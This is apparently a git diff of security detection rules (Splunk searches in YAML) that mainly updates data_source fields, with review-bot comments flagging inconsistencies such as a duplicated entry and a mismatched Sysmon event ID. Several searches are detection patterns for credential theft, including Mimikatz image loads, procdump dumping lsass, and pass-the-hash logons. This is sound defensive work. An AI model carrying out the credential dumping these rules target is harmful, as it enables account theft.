index 947a556374..3222e4c2d7 100644
--- a/detections/cloud/cloud_compute_instance_created_by_previously_unseen_user.yml
+++ b/detections/cloud/cloud_compute_instance_created_by_previously_unseen_user.yml
@@ -12,7 +12,8 @@ description: The following analytic identifies the creation of cloud compute ins
access or misuse of cloud resources by new or compromised accounts. If confirmed
malicious, attackers could deploy unauthorized compute instances, leading to potential
data exfiltration, increased costs, or further exploitation within the cloud environment.
-data_source: []
+data_source:
+- AWS CloudTrail
search: '| tstats `security_content_summariesonly` count earliest(_time) as firstTime,
latest(_time) as lastTime values(All_Changes.object) as dest from datamodel=Change
where All_Changes.action=created by All_Changes.user All_Changes.vendor_region |
diff --git a/detections/cloud/cloud_compute_instance_created_in_previously_unused_region.yml b/detections/cloud/cloud_compute_instance_created_in_previously_unused_region.yml
index a638de67a2..e7b1e13efb 100644
--- a/detections/cloud/cloud_compute_instance_created_in_previously_unused_region.yml
+++ b/detections/cloud/cloud_compute_instance_created_in_previously_unused_region.yml
@@ -13,7 +13,8 @@ description: The following analytic detects the creation of a cloud compute inst
activity, such as an attacker attempting to evade detection or establish a foothold
in a less monitored area. If confirmed malicious, this could lead to unauthorized
resource usage, data exfiltration, or further compromise of the cloud environment.
-data_source: []
+data_source:
+- AWS CloudTrail
search: '| tstats earliest(_time) as firstTime latest(_time) as lastTime values(All_Changes.object_id)
as dest, count from datamodel=Change where All_Changes.action=created by All_Changes.vendor_region,
All_Changes.user | `drop_dm_object_name("All_Changes")` | lookup previously_seen_cloud_regions
diff --git a/detections/cloud/cloud_compute_instance_created_with_previously_unseen_image.yml b/detections/cloud/cloud_compute_instance_created_with_previously_unseen_image.yml
index 7114193294..59875c8683 100644
--- a/detections/cloud/cloud_compute_instance_created_with_previously_unseen_image.yml
+++ b/detections/cloud/cloud_compute_instance_created_with_previously_unseen_image.yml
@@ -7,7 +7,8 @@ status: experimental
type: Anomaly
description: |-
The following analytic detects the creation of cloud compute instances using previously unseen image IDs. It leverages cloud infrastructure logs to identify new image IDs that have not been observed before. This activity is significant because it may indicate unauthorized or suspicious activity, such as the deployment of malicious payloads or unauthorized access to sensitive information. If confirmed malicious, this could lead to data breaches, unauthorized access, or further compromise of the cloud environment. Immediate investigation is required to determine the legitimacy of the instance creation and to mitigate potential threats.
-data_source: []
+data_source:
+- AWS CloudTrail
search: '| tstats count earliest(_time) as firstTime, latest(_time) as lastTime values(All_Changes.object_id)
as dest from datamodel=Change where All_Changes.action=created by All_Changes.Instance_Changes.image_id,
All_Changes.user | `drop_dm_object_name("All_Changes")` | `drop_dm_object_name("Instance_Changes")`
diff --git a/detections/cloud/cloud_compute_instance_created_with_previously_unseen_instance_type.yml b/detections/cloud/cloud_compute_instance_created_with_previously_unseen_instance_type.yml
index 51ba95c9c5..85af9797fc 100644
--- a/detections/cloud/cloud_compute_instance_created_with_previously_unseen_instance_type.yml
+++ b/detections/cloud/cloud_compute_instance_created_with_previously_unseen_instance_type.yml
@@ -13,7 +13,8 @@ description: The following analytic detects the creation of EC2 instances with p
purposes. If confirmed malicious, this could lead to unauthorized access, data exfiltration,
system compromise, or service disruption. Immediate investigation is required to
determine the legitimacy of the instance creation.
-data_source: []
+data_source:
+- AWS CloudTrail
search: '| tstats earliest(_time) as firstTime, latest(_time) as lastTime values(All_Changes.object_id)
as dest, count from datamodel=Change where All_Changes.action=created by All_Changes.Instance_Changes.instance_type,
All_Changes.user | `drop_dm_object_name("All_Changes")` | `drop_dm_object_name("Instance_Changes")`
diff --git a/detections/cloud/cloud_instance_modified_by_previously_unseen_user.yml b/detections/cloud/cloud_instance_modified_by_previously_unseen_user.yml
index b2bf148f5e..b80986d4ea 100644
--- a/detections/cloud/cloud_instance_modified_by_previously_unseen_user.yml
+++ b/detections/cloud/cloud_instance_modified_by_previously_unseen_user.yml
@@ -12,7 +12,8 @@ description: The following analytic identifies cloud instances being modified by
or malicious users. If confirmed malicious, this could lead to unauthorized access,
configuration changes, or potential disruption of cloud services, posing a significant
risk to the organization's cloud infrastructure.
-data_source: []
+data_source:
+- AWS CloudTrail
search: '| tstats `security_content_summariesonly` count earliest(_time) as firstTime,
latest(_time) as lastTime values(All_Changes.object_id) as object_id values(All_Changes.command)
as command from datamodel=Change where All_Changes.action=modified All_Changes.change_type=EC2
diff --git a/detections/cloud/detect_aws_console_login_by_new_user.yml b/detections/cloud/detect_aws_console_login_by_new_user.yml
index a5f08b2e0c..523d3cb63b 100644
--- a/detections/cloud/detect_aws_console_login_by_new_user.yml
+++ b/detections/cloud/detect_aws_console_login_by_new_user.yml
@@ -12,7 +12,8 @@ description: The following analytic detects AWS console login events by new user
unauthorized access. If confirmed malicious, this activity could lead to unauthorized
access to AWS resources, data exfiltration, or further exploitation within the cloud
environment.
-data_source: []
+data_source:
+- AWS CloudTrail
search: '| tstats earliest(_time) as firstTime latest(_time) as lastTime from datamodel=Authentication
where Authentication.signature=ConsoleLogin by Authentication.user | `drop_dm_object_name(Authentication)`
| join user type=outer [ | inputlookup previously_seen_users_console_logins | stats
diff --git a/detections/cloud/detect_new_open_s3_buckets.yml b/detections/cloud/detect_new_open_s3_buckets.yml
index 64a68a65f9..c4198c281d 100644
--- a/detections/cloud/detect_new_open_s3_buckets.yml
+++ b/detections/cloud/detect_new_open_s3_buckets.yml
@@ -12,7 +12,8 @@ description: The following analytic identifies the creation of open/public S3 bu
data to unauthorized access, leading to data breaches. If confirmed malicious, an
attacker could read, write, or fully control the contents of the bucket, potentially
leading to data exfiltration or tampering.
-data_source: []
+data_source:
+- AWS CloudTrail
search: '`cloudtrail` eventSource=s3.amazonaws.com eventName=PutBucketAcl | rex field=_raw
"(?{.+})" | spath input=json_field output=grantees path=requestParameters.AccessControlPolicy.AccessControlList.Grant{}
| search grantees=* | mvexpand grantees | spath input=grantees output=uri path=Grantee.URI
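Review bot: `- AWS CloudTrail` is the generic entry here even though the search keys on one event, `eventSource=s3.amazonaws.com eventName=PutBucketAcl`, while other hunks in this diff name the specific CloudTrail event per entry (`AWS CloudTrail CreateNetworkAclEntry`, `AWS CloudTrail ReplaceNetworkAclEntry`). If a data source named for PutBucketAcl is registered under data_sources/, `- AWS CloudTrail PutBucketAcl` would keep the list consistent and make the dependency on that event explicit; if not, a note on why the generic entry is used would help.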
diff --git a/detections/cloud/detect_new_open_s3_buckets_over_aws_cli.yml b/detections/cloud/detect_new_open_s3_buckets_over_aws_cli.yml
index c81623d904..91cabf7138 100644
--- a/detections/cloud/detect_new_open_s3_buckets_over_aws_cli.yml
+++ b/detections/cloud/detect_new_open_s3_buckets_over_aws_cli.yml
@@ -12,7 +12,8 @@ description: The following analytic detects the creation of open/public S3 bucke
unauthorized users, leading to data breaches. If confirmed malicious, an attacker
could gain unauthorized access to potentially sensitive information stored in the
S3 bucket, posing a significant security risk.
-data_source: []
+data_source:
+- AWS CloudTrail
search: '`cloudtrail` eventSource="s3.amazonaws.com" (userAgent="[aws-cli*" OR userAgent=aws-cli*
) eventName=PutBucketAcl OR requestParameters.accessControlList.x-amz-grant-read-acp
IN ("*AuthenticatedUsers","*AllUsers") OR requestParameters.accessControlList.x-amz-grant-write
diff --git a/detections/cloud/detect_spike_in_aws_security_hub_alerts_for_ec2_instance.yml b/detections/cloud/detect_spike_in_aws_security_hub_alerts_for_ec2_instance.yml
index 56d8380142..131d791a79 100644
--- a/detections/cloud/detect_spike_in_aws_security_hub_alerts_for_ec2_instance.yml
+++ b/detections/cloud/detect_spike_in_aws_security_hub_alerts_for_ec2_instance.yml
@@ -13,7 +13,8 @@ description: The following analytic identifies a spike in the number of AWS Secu
attention. If confirmed malicious, this could signify an ongoing attack, leading
to unauthorized access, data exfiltration, or disruption of services on the affected
EC2 instance.
-data_source: []
+data_source:
+- AWS Security Hub
search: '`aws_securityhub_finding` "Resources{}.Type"=AWSEC2Instance | bucket span=4h
_time | stats count AS alerts values(Title) as Title values(Types{}) as Types values(vendor_account)
as vendor_account values(vendor_region) as vendor_region values(severity) as severity
@@ -57,7 +58,6 @@ tags:
tests:
- name: True Positive Test
attack_data:
- - data:
- https://media.githubusercontent.com/media/splunk/attack_data/master/datasets/suspicious_behaviour/security_hub_ec2_spike/security_hub_ec2_spike.json
+ - data: https://media.githubusercontent.com/media/splunk/attack_data/master/datasets/suspicious_behaviour/security_hub_ec2_spike/security_hub_ec2_spike.json
sourcetype: aws:securityhub:finding
source: aws_securityhub_finding
diff --git a/detections/cloud/detect_spike_in_aws_security_hub_alerts_for_user.yml b/detections/cloud/detect_spike_in_aws_security_hub_alerts_for_user.yml
index 154cc31d2f..14a717bb9a 100644
--- a/detections/cloud/detect_spike_in_aws_security_hub_alerts_for_user.yml
+++ b/detections/cloud/detect_spike_in_aws_security_hub_alerts_for_user.yml
@@ -12,7 +12,8 @@ description: The following analytic identifies a spike in the number of AWS Secu
for a specific user may indicate suspicious behavior or a potential security incident.
If confirmed malicious, this could signify an ongoing attack, unauthorized access,
or misuse of IAM credentials, potentially leading to data breaches or further exploitation.
-data_source: []
+data_source:
+- AWS Security Hub
search: '`aws_securityhub_finding` "findings{}.Resources{}.Type"= AwsIamUser | rename
findings{}.Resources{}.Id as user | bucket span=4h _time | stats count AS alerts
by _time user | eventstats avg(alerts) as total_launched_avg, stdev(alerts) as total_launched_stdev
diff --git a/detections/cloud/detect_spike_in_s3_bucket_deletion.yml b/detections/cloud/detect_spike_in_s3_bucket_deletion.yml
index aa766740e1..88ed86c86e 100644
--- a/detections/cloud/detect_spike_in_s3_bucket_deletion.yml
+++ b/detections/cloud/detect_spike_in_s3_bucket_deletion.yml
@@ -13,7 +13,8 @@ description: The following analytic identifies a spike in API activity related t
destruction. If confirmed malicious, this could lead to significant data loss, disruption
of services, and potential exposure of sensitive information. Immediate investigation
is required to determine the legitimacy of the activity.
-data_source: []
+data_source:
+- AWS CloudTrail
search: '`cloudtrail` eventName=DeleteBucket [search `cloudtrail` eventName=DeleteBucket
| spath output=arn path=userIdentity.arn | stats count as apiCalls by arn | inputlookup
s3_deletion_baseline append=t | fields - latestCount | stats values(*) as * by arn
diff --git a/detections/cloud/gsuite_drive_share_in_external_email.yml b/detections/cloud/gsuite_drive_share_in_external_email.yml
index 1415347b8c..a6e197b24e 100644
--- a/detections/cloud/gsuite_drive_share_in_external_email.yml
+++ b/detections/cloud/gsuite_drive_share_in_external_email.yml
@@ -12,7 +12,8 @@ description: The following analytic detects Google Drive or Google Docs files sh
attacker or insider. If confirmed malicious, this could lead to unauthorized access
to sensitive information, data leakage, and potential compliance violations. Monitoring
this behavior helps in early detection and mitigation of data breaches.
-data_source: []
+data_source:
+- G Suite Drive
search: '`gsuite_drive` NOT (email IN("", "null")) | rex field=parameters.owner "[^@]+@(?[^@]+)"
| rex field=email "[^@]+@(?[^@]+)" | where src_domain = "internal_test_email.com"
and not dest_domain = "internal_test_email.com" | eval phase="plan" | eval severity="low"
diff --git a/detections/cloud/o365_multiple_appids_and_useragents_authentication_spike.yml b/detections/cloud/o365_multiple_appids_and_useragents_authentication_spike.yml
index bd9b79e5ff..6dac7c57d2 100644
--- a/detections/cloud/o365_multiple_appids_and_useragents_authentication_spike.yml
+++ b/detections/cloud/o365_multiple_appids_and_useragents_authentication_spike.yml
@@ -6,7 +6,7 @@ author: Mauricio Velazco, Splunk
status: production
type: Anomaly
data_source:
-- O365 UserLoggedIn
+- O365 UserLoggedIn
- O365 UserLoginFailed
description: The following analytic identifies unusual authentication activity in
an O365 environment, where a single user account experiences more than 8 authentication
diff --git a/detections/deprecated/detect_activity_related_to_pass_the_hash_attacks.yml b/detections/deprecated/detect_activity_related_to_pass_the_hash_attacks.yml
index d7e447007a..0c911874c3 100644
--- a/detections/deprecated/detect_activity_related_to_pass_the_hash_attacks.yml
+++ b/detections/deprecated/detect_activity_related_to_pass_the_hash_attacks.yml
@@ -8,7 +8,7 @@ type: Hunting
description: This search looks for specific authentication events from the Windows
Security Event logs to detect potential attempts at using the Pass-the-Hash technique. This search is DEPRECATED as it is possible for event code 4624 to generate a high level of noise, as legitimate logon events may also trigger this event code. This can be especially true in environments with high levels of user activity, such as those with many concurrent logons or frequent logon attempts.
data_source:
-- Windows Security 4624
+- Windows Event Log Security 4624
search: '`wineventlog_security` EventCode=4624 (Logon_Type=3 Logon_Process=NtLmSsp NOT AccountName="ANONYMOUS LOGON") OR (Logon_Type=9 Logon_Process=seclogo)
| fillnull
| stats count min(_time) as firstTime max(_time) as lastTime by EventCode, Logon_Type, WorkstationName, user, dest
diff --git a/detections/deprecated/detect_mimikatz_using_loaded_images.yml b/detections/deprecated/detect_mimikatz_using_loaded_images.yml
index 02d6963b9f..3d89d50c5d 100644
--- a/detections/deprecated/detect_mimikatz_using_loaded_images.yml
+++ b/detections/deprecated/detect_mimikatz_using_loaded_images.yml
@@ -8,7 +8,7 @@ type: TTP
description: This search looks for reading loaded Images unique to credential dumping
with Mimikatz. Deprecated because mimikatz libraries changed and very noisy sysmon Event Code.
data_source:
-- Sysmon Event ID 7
+- Sysmon EventID 7
search: '`sysmon` EventCode=7 | stats values(ImageLoaded) as ImageLoaded values(ProcessId)
as ProcessId by dest, Image | search ImageLoaded=*WinSCard.dll ImageLoaded=*cryptdll.dll
ImageLoaded=*hid.dll ImageLoaded=*samlib.dll ImageLoaded=*vaultcli.dll | `security_content_ctime(firstTime)`| `security_content_ctime(lastTime)`
diff --git a/detections/deprecated/dump_lsass_via_procdump_rename.yml b/detections/deprecated/dump_lsass_via_procdump_rename.yml
index cb21bd1476..904d367839 100644
--- a/detections/deprecated/dump_lsass_via_procdump_rename.yml
+++ b/detections/deprecated/dump_lsass_via_procdump_rename.yml
@@ -15,7 +15,7 @@ description: 'Detect a renamed instance of procdump.exe dumping the lsass proces
the command line. Review other endpoint data sources for cross process (injection)
into lsass.exe.'
data_source:
-- Sysmon Event ID 1
+- Sysmon EventID 1
search: '`sysmon` OriginalFileName=procdump process_name!=procdump*.exe EventID=1
(CommandLine=*-ma* OR CommandLine=*-mm*) CommandLine=*lsass* | stats count min(_time) as firstTime max(_time) as lastTime by dest, parent_process_name,
process_name, OriginalFileName, CommandLine | `security_content_ctime(firstTime)`
diff --git a/detections/deprecated/execution_of_file_with_spaces_before_extension.yml b/detections/deprecated/execution_of_file_with_spaces_before_extension.yml
index 2b512d11e3..7519f91f51 100644
--- a/detections/deprecated/execution_of_file_with_spaces_before_extension.yml
+++ b/detections/deprecated/execution_of_file_with_spaces_before_extension.yml
@@ -9,7 +9,7 @@ description: This search looks for processes launched from files with at least f
spaces in the name before the extension. This is typically done to obfuscate the
file extension by pushing it outside of the default view.
data_source:
-- Sysmon Event ID 1
+- Sysmon EventID 1
search: '| tstats `security_content_summariesonly` count values(Processes.process_path)
as process_path min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes
where Processes.process = "* .*" by Processes.dest Processes.user Processes.process
diff --git a/detections/deprecated/first_time_seen_command_line_argument.yml b/detections/deprecated/first_time_seen_command_line_argument.yml
index 3e63b16ad4..b29165d760 100644
--- a/detections/deprecated/first_time_seen_command_line_argument.yml
+++ b/detections/deprecated/first_time_seen_command_line_argument.yml
@@ -8,7 +8,7 @@ type: Hunting
description: This search looks for command-line arguments that use a `/c` parameter
to execute a command that has not previously been seen.
data_source:
-- Sysmon Event ID 1
+- Sysmon EventID 1
search: '| tstats `security_content_summariesonly` min(_time) as firstTime max(_time)
as lastTime from datamodel=Endpoint.Processes where Processes.process_name = cmd.exe
Processes.process = "* /c *" by Processes.process Processes.process_name Processes.parent_process_name
diff --git a/detections/deprecated/processes_created_by_netsh.yml b/detections/deprecated/processes_created_by_netsh.yml
index 3ecfc79310..9caca611a1 100644
--- a/detections/deprecated/processes_created_by_netsh.yml
+++ b/detections/deprecated/processes_created_by_netsh.yml
@@ -13,7 +13,7 @@ description: This search looks for processes launching netsh.exe to execute vari
we are looking for processes spawned by netsh.exe that are executing commands via
the command line. Deprecated because we have another detection of the same type.
data_source:
-- Sysmon Event ID 1
+- Sysmon EventID 1
search: '| tstats `security_content_summariesonly` count values(Processes.process)
as process min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes
where Processes.process_name=netsh.exe by Processes.user Processes.dest Processes.parent_process
diff --git a/detections/deprecated/prohibited_software_on_endpoint.yml b/detections/deprecated/prohibited_software_on_endpoint.yml
index 19c26ef4b0..27b76ed896 100644
--- a/detections/deprecated/prohibited_software_on_endpoint.yml
+++ b/detections/deprecated/prohibited_software_on_endpoint.yml
@@ -8,7 +8,7 @@ type: Hunting
description: This search looks for applications on the endpoint that you have marked
as prohibited.
data_source:
-- Sysmon Event ID 1
+- Sysmon EventID 1
search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
as lastTime from datamodel=Endpoint.Processes by Processes.dest Processes.user Processes.process_name
| `security_content_ctime(firstTime)`| `security_content_ctime(lastTime)` | `drop_dm_object_name(Processes)`
diff --git a/detections/deprecated/reg_exe_used_to_hide_files_directories_via_registry_keys.yml b/detections/deprecated/reg_exe_used_to_hide_files_directories_via_registry_keys.yml
index 2ea024a58f..26ee538d51 100644
--- a/detections/deprecated/reg_exe_used_to_hide_files_directories_via_registry_keys.yml
+++ b/detections/deprecated/reg_exe_used_to_hide_files_directories_via_registry_keys.yml
@@ -8,7 +8,7 @@ type: TTP
description: The search looks for command-line arguments used to hide a file or directory
using the reg add command.
data_source:
-- Sysmon Event ID 1
+- Sysmon EventID 1
search: '| tstats `security_content_summariesonly` values(Processes.process) as process
min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes
where Processes.process_name = reg.exe Processes.process="*add*" Processes.process="*Hidden*"
diff --git a/detections/deprecated/remote_registry_key_modifications.yml b/detections/deprecated/remote_registry_key_modifications.yml
index dd3149032e..8c8435ee89 100644
--- a/detections/deprecated/remote_registry_key_modifications.yml
+++ b/detections/deprecated/remote_registry_key_modifications.yml
@@ -7,7 +7,7 @@ status: deprecated
type: TTP
description: This search monitors for remote modifications to registry keys.
data_source:
-- Sysmon Event ID 13
+- Sysmon EventID 13
search: '| tstats `security_content_summariesonly` count values(Registry.registry_key_name)
as registry_key_name values(Registry.registry_path) as registry_path min(_time)
as firstTime max(_time) as lastTime from datamodel=Endpoint.Registry where Registry.registry_path="\\\\*" by
diff --git a/detections/deprecated/scheduled_tasks_used_in_badrabbit_ransomware.yml b/detections/deprecated/scheduled_tasks_used_in_badrabbit_ransomware.yml
index 3c511d4da3..e7d235b110 100644
--- a/detections/deprecated/scheduled_tasks_used_in_badrabbit_ransomware.yml
+++ b/detections/deprecated/scheduled_tasks_used_in_badrabbit_ransomware.yml
@@ -9,7 +9,7 @@ description: This search looks for flags passed to schtasks.exe on the command-l
that indicate that task names related to the execution of Bad Rabbit ransomware
were created or deleted. Deprecated because we already have a similar detection
data_source:
-- Sysmon Event ID 1
+- Sysmon EventID 1
search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
as lastTime values(Processes.process) as process from datamodel=Endpoint.Processes
where Processes.process_name=schtasks.exe (Processes.process= "*create*" OR Processes.process=
diff --git a/detections/deprecated/suspicious_changes_to_file_associations.yml b/detections/deprecated/suspicious_changes_to_file_associations.yml
index 1d0f536cf9..08ca5c2989 100644
--- a/detections/deprecated/suspicious_changes_to_file_associations.yml
+++ b/detections/deprecated/suspicious_changes_to_file_associations.yml
@@ -9,7 +9,7 @@ description: This search looks for changes to registry values that control Windo
file associations, executed by a process that is not typical for legitimate, routine
changes to this area.
data_source:
-- Sysmon Event ID 1
+- Sysmon EventID 1
search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
as lastTime values(Processes.process_name) as process_name values(Processes.parent_process_name)
as parent_process_name FROM datamodel=Endpoint.Processes where Processes.process_name!=Explorer.exe
diff --git a/detections/deprecated/suspicious_file_write.yml b/detections/deprecated/suspicious_file_write.yml
index 8adf06a7f0..b7a2b0c9ef 100644
--- a/detections/deprecated/suspicious_file_write.yml
+++ b/detections/deprecated/suspicious_file_write.yml
@@ -8,7 +8,7 @@ type: Hunting
description: The search looks for files created with names that have been linked to
malicious activity.
data_source:
-- Sysmon Event ID 11
+- Sysmon EventID 11
search: '| tstats `security_content_summariesonly` count values(Filesystem.action)
as action values(Filesystem.file_path) as file_path min(_time) as firstTime max(_time)
as lastTime FROM datamodel=Endpoint.Filesystem by Filesystem.file_name Filesystem.dest
diff --git a/detections/deprecated/suspicious_powershell_command_line_arguments.yml b/detections/deprecated/suspicious_powershell_command_line_arguments.yml
index 5a791c4a41..572bb38339 100644
--- a/detections/deprecated/suspicious_powershell_command_line_arguments.yml
+++ b/detections/deprecated/suspicious_powershell_command_line_arguments.yml
@@ -13,7 +13,7 @@ description: This search looks for PowerShell processes started with a base64 en
passes an encoded script to be run on the command-line. Deprecated because almost
the same as Malicious PowerShell Process - Encoded Command
data_source:
-- Sysmon Event ID 1
+- Sysmon EventID 1
search: '| tstats `security_content_summariesonly` count values(Processes.process)
as process values(Processes.parent_process) as parent_process min(_time) as firstTime
max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.process_name=powershell.exe
diff --git a/detections/deprecated/suspicious_rundll32_rename.yml b/detections/deprecated/suspicious_rundll32_rename.yml
index 6abf25019f..015dddaa02 100644
--- a/detections/deprecated/suspicious_rundll32_rename.yml
+++ b/detections/deprecated/suspicious_rundll32_rename.yml
@@ -12,7 +12,7 @@ description: The following hunting analytic identifies renamed instances of rund
name from the PE meta data. Expand the query as needed by looking for specific command
line arguments outlined in other analytics.
data_source:
-- Sysmon Event ID 1
+- Sysmon EventID 1
search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
as lastTime from datamodel=Endpoint.Processes where Processes.original_file_name=RUNDLL32.exe
AND Processes.process_name!=rundll32.exe by Processes.dest Processes.user Processes.parent_process_name
diff --git a/detections/deprecated/suspicious_writes_to_system_volume_information.yml b/detections/deprecated/suspicious_writes_to_system_volume_information.yml
index 32a61fd9fa..c3ea9c5edf 100644
--- a/detections/deprecated/suspicious_writes_to_system_volume_information.yml
+++ b/detections/deprecated/suspicious_writes_to_system_volume_information.yml
@@ -8,7 +8,7 @@ type: Hunting
description: This search detects writes to the 'System Volume Information' folder
by something other than the System process.
data_source:
-- Sysmon Event ID 1
+- Sysmon EventID 1
search: '(`sysmon` OR tag=process) EventCode=11 process_id!=4 file_path=*System\ Volume
Information* | stats count min(_time) as firstTime max(_time) as lastTime by dest,
Image, file_path | `security_content_ctime(firstTime)`| `security_content_ctime(lastTime)`
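Review bot: The renamed entry `- Sysmon EventID 1` still disagrees with the search that follows it, which filters `EventCode=11` with `file_path` (a file-create event), not process creation. The rename carries the old mismatch forward instead of fixing it; the line should read `- Sysmon EventID 11`, matching the other file-write analytics touched in this change (suspicious_file_write.yml and windows_hosts_file_modification.yml both map to EventID 11). Only the data_source block and the head of the search are inside the hunk; the rest of the search is outside it.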
diff --git a/detections/deprecated/uncommon_processes_on_endpoint.yml b/detections/deprecated/uncommon_processes_on_endpoint.yml
index 3332774ef7..18a30cc4de 100644
--- a/detections/deprecated/uncommon_processes_on_endpoint.yml
+++ b/detections/deprecated/uncommon_processes_on_endpoint.yml
@@ -8,7 +8,7 @@ type: Hunting
description: This search looks for applications on the endpoint that you have marked
as uncommon.
data_source:
-- Sysmon Event ID 1
+- Sysmon EventID 1
search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
as lastTime from datamodel=Endpoint.Processes by Processes.dest Processes.user Processes.process
Processes.process_name | `security_content_ctime(firstTime)`| `security_content_ctime(lastTime)`
diff --git a/detections/deprecated/unsigned_image_loaded_by_lsass.yml b/detections/deprecated/unsigned_image_loaded_by_lsass.yml
index 51423fd51a..5a926b6aff 100644
--- a/detections/deprecated/unsigned_image_loaded_by_lsass.yml
+++ b/detections/deprecated/unsigned_image_loaded_by_lsass.yml
@@ -8,7 +8,7 @@ type: TTP
description: This search detects loading of unsigned images by LSASS. Deprecated because
too noisy.
data_source:
-- Sysmon Event ID 7
+- Sysmon EventID 7
search: '`sysmon` EventID=7 Image=*lsass.exe Signed=false | stats count min(_time)
as firstTime max(_time) as lastTime by dest, Image, ImageLoaded, Signed, SHA1
| `security_content_ctime(firstTime)`| `security_content_ctime(lastTime)`
diff --git a/detections/deprecated/windows_connhost_exe_started_forcefully.yml b/detections/deprecated/windows_connhost_exe_started_forcefully.yml
index 4eb62ad733..173ee8ff8a 100644
--- a/detections/deprecated/windows_connhost_exe_started_forcefully.yml
+++ b/detections/deprecated/windows_connhost_exe_started_forcefully.yml
@@ -11,7 +11,7 @@ description: 'The search looks for the Console Window Host process (connhost.exe
seen in the windows 10 client of attack_range_local. After further testing we realized
this is not specific to Ryuk. '
data_source:
-- Sysmon Event ID 1
+- Sysmon EventID 1
search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
as lastTime FROM datamodel=Endpoint.Processes WHERE Processes.process="*C:\\Windows\\system32\\conhost.exe*
0xffffffff *-ForceV1*" by Processes.user Processes.process_name Processes.process
diff --git a/detections/deprecated/windows_dll_search_order_hijacking_hunt.yml b/detections/deprecated/windows_dll_search_order_hijacking_hunt.yml
index 330795f059..d81b9ab21e 100644
--- a/detections/deprecated/windows_dll_search_order_hijacking_hunt.yml
+++ b/detections/deprecated/windows_dll_search_order_hijacking_hunt.yml
@@ -17,6 +17,9 @@ description: The following hunting analytic is an experimental query built again
the Hijacklibs.net project.
data_source:
- Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
+- Windows Event Log Security 4688
search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
as lastTime values(Processes.process_name) as process_name from datamodel=Endpoint.Processes
where Processes.dest!=unknown Processes.user!=unknown NOT (Processes.process_path
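Review bot: `- Windows Event Log Security 4688` is added twice in this hunk (the first and third added lines), leaving a duplicate entry in the data_source sequence. The other process-creation detections in this change add exactly one 4688 line followed by `- CrowdStrike ProcessRollup2`; dropping the third added line brings this file in line with them. A repeated sequence item parses fine as YAML, but whether contentctl's validation tolerates or double-counts it I can't confirm from here, so better to remove it now.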
diff --git a/detections/deprecated/windows_hosts_file_modification.yml b/detections/deprecated/windows_hosts_file_modification.yml
index 49c1c72255..ffa7d52961 100644
--- a/detections/deprecated/windows_hosts_file_modification.yml
+++ b/detections/deprecated/windows_hosts_file_modification.yml
@@ -8,7 +8,7 @@ type: TTP
description: The search looks for modifications to the hosts file on all Windows endpoints
across your environment.
data_source:
-- Sysmon Event ID 11
+- Sysmon EventID 11
search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
as lastTime FROM datamodel=Endpoint.Filesystem by Filesystem.file_name Filesystem.file_path
Filesystem.dest | `security_content_ctime(lastTime)` | `security_content_ctime(firstTime)`
diff --git a/detections/endpoint/7zip_commandline_to_smb_share_path.yml b/detections/endpoint/7zip_commandline_to_smb_share_path.yml
index 76c046406f..b065f64bc2 100644
--- a/detections/endpoint/7zip_commandline_to_smb_share_path.yml
+++ b/detections/endpoint/7zip_commandline_to_smb_share_path.yml
@@ -14,6 +14,8 @@ description: The following analytic detects the execution of 7z or 7za processes
sensitive information and potentially aiding further attacks.
data_source:
- Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
as lastTime from datamodel=Endpoint.Processes where (Processes.process_name ="7z.exe"
OR Processes.process_name = "7za.exe" OR Processes.original_file_name = "7z.exe"
diff --git a/detections/endpoint/account_discovery_with_net_app.yml b/detections/endpoint/account_discovery_with_net_app.yml
index 2f4a8fd313..9c6aa7d7a1 100644
--- a/detections/endpoint/account_discovery_with_net_app.yml
+++ b/detections/endpoint/account_discovery_with_net_app.yml
@@ -15,6 +15,8 @@ description: The following analytic detects potential account discovery activiti
a significant security risk.
data_source:
- Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
search: '| tstats `security_content_summariesonly` values(Processes.process) as process
values(Processes.parent_process) as parent_process values(Processes.process_id)
as process_id count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes
diff --git a/detections/endpoint/active_setup_registry_autostart.yml b/detections/endpoint/active_setup_registry_autostart.yml
index 203813afd5..35414f35ac 100644
--- a/detections/endpoint/active_setup_registry_autostart.yml
+++ b/detections/endpoint/active_setup_registry_autostart.yml
@@ -14,7 +14,7 @@ description: The following analytic detects suspicious modifications to the Acti
code upon system startup, potentially leading to further system compromise and unauthorized
access.
data_source:
-- Sysmon EventID 12
+- Sysmon EventID 12
- Sysmon EventID 13
search: '| tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Registry
WHERE (Registry.registry_value_name= "StubPath" Registry.registry_path = "*\\SOFTWARE\\Microsoft\\Active
diff --git a/detections/endpoint/add_defaultuser_and_password_in_registry.yml b/detections/endpoint/add_defaultuser_and_password_in_registry.yml
index e84b56e1ef..549e04b2db 100644
--- a/detections/endpoint/add_defaultuser_and_password_in_registry.yml
+++ b/detections/endpoint/add_defaultuser_and_password_in_registry.yml
@@ -15,8 +15,7 @@ description: The following analytic detects suspicious registry modifications th
to maintain persistence and further encrypt the network, leading to significant
data loss and operational disruption.
data_source:
-- Sysmon EventID 1
-- Sysmon EventID 13
+- Sysmon EventID 13
- Sysmon EventID 14
search: '| tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Registry
WHERE (Registry.registry_path= "*SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon*"
diff --git a/detections/endpoint/add_or_set_windows_defender_exclusion.yml b/detections/endpoint/add_or_set_windows_defender_exclusion.yml
index 693246971c..82a65ac702 100644
--- a/detections/endpoint/add_or_set_windows_defender_exclusion.yml
+++ b/detections/endpoint/add_or_set_windows_defender_exclusion.yml
